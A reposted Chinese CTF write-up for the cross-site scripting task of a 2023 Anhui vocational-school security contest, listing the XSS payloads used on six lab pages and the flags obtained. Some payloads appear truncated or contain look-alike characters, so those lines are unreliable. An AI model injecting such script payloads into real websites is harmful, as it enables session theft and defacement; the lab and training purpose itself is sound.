0


2023年安徽省中职网络安全跨站脚本攻击

B-4:跨站脚本攻击

任务环境说明:

√ 服务器场景:Server2125(关闭链接)

√ 服务器场景操作系统:未知

√ 用户名:未知 密码:未知

1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;

通过尝试知道这里存在xss漏洞

?name=<script>alert(1)</script>

flag{luKOh/C9obMtoJUtHD37Zg}

2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><script>alert(1)</script>

flag{199bZN8Rge8dYtZGoTqoYA}

3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

通过两段代码的不同我们可以知道’在里面的重要性

‘οnclick=’javascript:alert(1)

flag{wO+8fB5yu3KCdNq5V7Uo5g}

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“οnclick=’javascript:alert(1)’

flag{0XRMADSrrZh7Ptv1VS9/zw}

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“>

flag{Si3Czm1JYclcYp4KklGM3A}

6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

">

flag{Mki8dUfOl7Khl7KgbPcoPQ}


本文转载自: https://blog.csdn.net/qq_61988806/article/details/129584037
版权归原作者 许允er 所有, 如有侵权,请联系我们删除。

“2023年安徽省中职网络安全跨站脚本攻击”的评论:

还没有评论